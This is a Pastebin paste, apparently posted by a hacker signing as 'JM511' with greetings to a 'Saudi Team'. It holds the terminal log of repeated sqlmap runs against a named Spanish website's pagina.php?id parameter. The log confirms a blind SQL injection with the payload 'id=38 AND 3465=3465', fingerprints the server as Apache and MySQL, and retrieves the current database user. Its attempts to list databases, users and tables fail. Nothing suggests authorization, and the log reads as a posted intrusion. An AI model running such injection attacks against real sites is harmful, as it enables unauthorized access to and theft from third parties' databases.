Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Friday 7-9-2012
- Greeting to Saudi Team ;)
- Published by JM511
- From Saudi Arabia ;)
- ============================
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://rivierainvest.es/pagina.php?id=38 --dbs
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 22:08:21
- [22:08:21] [INFO] using '/home/jm511/.sqlmap/output/rivierainvest.es/session' as session file
- [22:08:22] [INFO] testing connection to the target url
- [22:08:23] [INFO] testing if the url is stable, wait a few seconds
- [22:08:26] [INFO] url is stable
- [22:08:26] [INFO] testing if GET parameter 'id' is dynamic
- [22:08:26] [INFO] confirming that GET parameter 'id' is dynamic
- [22:08:27] [INFO] GET parameter 'id' is dynamic
- [22:08:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
- [22:08:27] [INFO] testing sql injection on GET parameter 'id'
- [22:08:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [22:09:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- [22:09:03] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
- [22:09:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [22:09:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [22:09:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
- [22:09:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
- [22:09:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
- GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
- sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=38 AND 3465=3465
- ---
- [22:11:53] [INFO] testing MySQL
- [22:11:54] [INFO] confirming MySQL
- [22:11:55] [INFO] the back-end DBMS is MySQL
- web application technology: Apache 2.0.59
- back-end DBMS: MySQL >= 5.0.2
- [22:11:55] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
- [22:11:55] [INFO] fetching database names
- [22:11:55] [INFO] fetching number of databases
- [22:11:55] [INFO] retrieved:
- [22:11:57] [ERROR] unable to retrieve the number of databases
- [22:11:57] [INFO] falling back to current database
- [22:11:57] [INFO] fetching current database
- [22:11:57] [INFO] retrieved:
- [22:12:26] [CRITICAL] unable to retrieve the database names
- [*] shutting down at: 22:12:26
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://rivierainvest.es/pagina.php?id=38 --users
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 22:12:33
- [22:12:34] [INFO] using '/home/jm511/.sqlmap/output/rivierainvest.es/session' as session file
- [22:12:34] [INFO] resuming injection data from session file
- [22:12:34] [INFO] resuming back-end DBMS 'mysql 5' from session file
- [22:12:34] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=38 AND 3465=3465
- ---
- [22:12:35] [INFO] the back-end DBMS is MySQL
- web application technology: Apache 2.0.59
- back-end DBMS: MySQL 5
- [22:12:35] [INFO] fetching database users
- [22:12:35] [INFO] fetching number of database users
- [22:12:35] [INFO] retrieved:
- [22:12:37] [CRITICAL] unable to retrieve the number of database users
- [*] shutting down at: 22:12:37
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://rivierainvest.es/pagina.php?id=38 --is-dba
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 22:18:06
- [22:18:06] [INFO] using '/home/jm511/.sqlmap/output/rivierainvest.es/session' as session file
- [22:18:06] [INFO] resuming injection data from session file
- [22:18:06] [INFO] resuming back-end DBMS 'mysql 5' from session file
- [22:18:07] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=38 AND 3465=3465
- ---
- [22:18:08] [INFO] the back-end DBMS is MySQL
- web application technology: Apache 2.0.59
- back-end DBMS: MySQL 5
- [22:18:08] [INFO] testing if current user is DBA
- [22:18:08] [INFO] fetching current user
- [22:18:08] [INFO] retrieved: ab5511@%
- [22:18:58] [INFO] retrieved:
- current user is DBA: 'False'
- [22:19:00] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/rivierainvest.es'
- [*] shutting down at: 22:19:00
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://rivierainvest.es/pagina.php?id=38 -D ab5511@% --tables
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 22:20:31
- [22:20:32] [INFO] using '/home/jm511/.sqlmap/output/rivierainvest.es/session' as session file
- [22:20:32] [INFO] resuming injection data from session file
- [22:20:32] [INFO] resuming back-end DBMS 'mysql 5' from session file
- [22:20:32] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=38 AND 3465=3465
- ---
- [22:20:32] [INFO] the back-end DBMS is MySQL
- web application technology: Apache 2.0.59
- back-end DBMS: MySQL 5
- [22:20:32] [INFO] fetching tables for database '`ab5511@%`'
- [22:20:32] [INFO] fetching number of tables for database '`ab5511@%`'
- [22:20:32] [INFO] retrieved:
- [22:20:34] [WARNING] unable to retrieve the number of tables for database '`ab5511@%`'
- [22:20:34] [CRITICAL] unable to retrieve the tables for any database
- [*] shutting down at: 22:20:34
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://rivierainvest.es/pagina.php?id=38 -D ab5511 --tables
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 22:20:40
- [22:20:40] [INFO] using '/home/jm511/.sqlmap/output/rivierainvest.es/session' as session file
- [22:20:40] [INFO] resuming injection data from session file
- [22:20:40] [INFO] resuming back-end DBMS 'mysql 5' from session file
- [22:20:40] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=38 AND 3465=3465
- ---
- [22:20:41] [INFO] the back-end DBMS is MySQL
- web application technology: Apache 2.0.59
- back-end DBMS: MySQL 5
- [22:20:41] [INFO] fetching tables for database 'ab5511'
- [22:20:41] [INFO] fetching number of tables for database 'ab5511'
- [22:20:41] [INFO] retrieved:
- [22:20:43] [WARNING] unable to retrieve the number of tables for database 'ab5511'
- [22:20:43] [CRITICAL] unable to retrieve the tables for any database
- [*] shutting down at: 22:20:43
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://rivierainvest.es/pagina.php?id=38 -D ab5511 --tables
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement